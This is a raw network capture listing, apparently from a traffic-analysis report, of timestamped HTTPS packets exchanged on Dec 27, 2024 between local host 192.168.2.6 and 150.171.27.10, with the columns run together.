                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.505533934 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.505546093 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.505649090 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.506095886 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.506110907 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.506174088 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.506180048 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.506223917 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.521630049 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.521667004 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.521737099 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.521786928 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.521825075 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.522377014 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.529628992 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.529680014 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.529722929 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.529733896 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.529771090 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.529771090 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.533970118 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.533987999 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.534051895 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.534073114 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.534101963 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.534121990 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.545208931 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.545228004 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.545278072 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.545289993 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.545326948 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.545341969 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.546304941 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.546323061 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.546395063 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.546415091 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.546473026 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.558671951 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.558686018 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.558783054 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.558804035 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.558861017 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.560703039 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.560719013 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.560827971 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.560834885 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.560970068 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.569396019 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.569410086 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.569509029 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.569529057 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.569583893 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.574134111 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.574148893 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.574207067 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.574213028 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.574238062 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.574279070 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.580847979 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.580862045 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.580924988 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.580941916 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.580993891 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.589498043 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.589513063 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.732372999 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.732420921 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.732441902 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.732482910 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.732503891 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.735721111 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.735738039 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.735804081 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.735810041 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.735934973 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.735934973 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.738950014 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.738965988 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.739012003 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.739048958 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.739075899 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.739104986 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.743401051 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.743417978 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.743518114 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.743525028 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.743582964 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.745573044 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.745589972 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.745644093 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.745663881 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.745729923 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.745749950 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.751176119 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.751192093 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.751255035 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.751261950 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.751331091 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.751331091 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.751734972 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.751749992 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.751805067 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.751827955 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.751895905 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.757631063 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.757646084 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.757740021 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.757762909 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.757816076 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.757930994 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.757946014 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.758053064 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.758059025 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.758311033 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.765166998 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.765182972 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.765275002 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.765283108 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.765331984 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.772834063 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.772850037 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.772924900 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.772932053 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.772969007 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.773003101 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.780577898 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.780596018 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.780664921 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.780672073 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.780687094 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.780791044 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.839526892 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.839550018 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.839608908 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.839617014 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.839675903 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.843604088 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.843631983 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.843720913 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.843739033 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.843750000 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.846153021 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.848570108 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.848588943 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.848689079 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.848695993 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.850481987 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.854996920 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.855021954 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.948282957 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.948323965 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.948343039 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.950571060 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.950587034 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.950707912 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.950728893 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.950776100 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.954349995 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.954380035 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.954433918 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.954449892 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.954485893 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.954510927 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.958193064 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.958209038 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.958271980 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.958280087 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.958396912 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.960861921 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.960890055 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.960975885 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.960994005 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.961039066 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.961060047 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.965481043 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.965500116 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.965574026 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.965584040 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.965641975 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.965642929 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.973150015 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.973170042 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.973227978 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.973234892 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.973493099 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.979923010 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.979940891 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.980000973 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.980009079 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.980047941 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:20.980067968 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.044128895 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.044332981 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.046243906 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.046267986 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.046315908 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.046328068 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.046370029 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.046391010 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.051331043 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.051340103 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.051773071 CET49739443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.051776886 CET44349739150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.053293943 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.053311110 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.053375006 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.053383112 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.053442955 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.053951025 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.053971052 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.054060936 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.054070950 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.054217100 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.062052011 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.062069893 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.062175989 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.062184095 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.062228918 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.062664986 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.062685013 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.062779903 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.062787056 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.063064098 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.070391893 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.070410013 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.070506096 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.070513010 CET44349733150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.070813894 CET49733443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.070907116 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.070925951 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.070969105 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.070976019 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.071007967 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.159569979 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.159681082 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.159688950 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.159811974 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.162331104 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.162363052 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.162417889 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.162425995 CET44349731150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.162458897 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.162475109 CET49731443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.166841984 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.166857958 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.166941881 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.166948080 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.167140007 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.174472094 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.174488068 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.174561977 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.174570084 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.174619913 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.181212902 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.181227922 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.181332111 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.181339979 CET44349730150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.181421995 CET49730443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.256767035 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.256789923 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.256861925 CET49732443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.256875038 CET44349732150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                            Dec 27, 2024 07:09:21.256920099 CET49732443192.168.2.6150.171.27.10
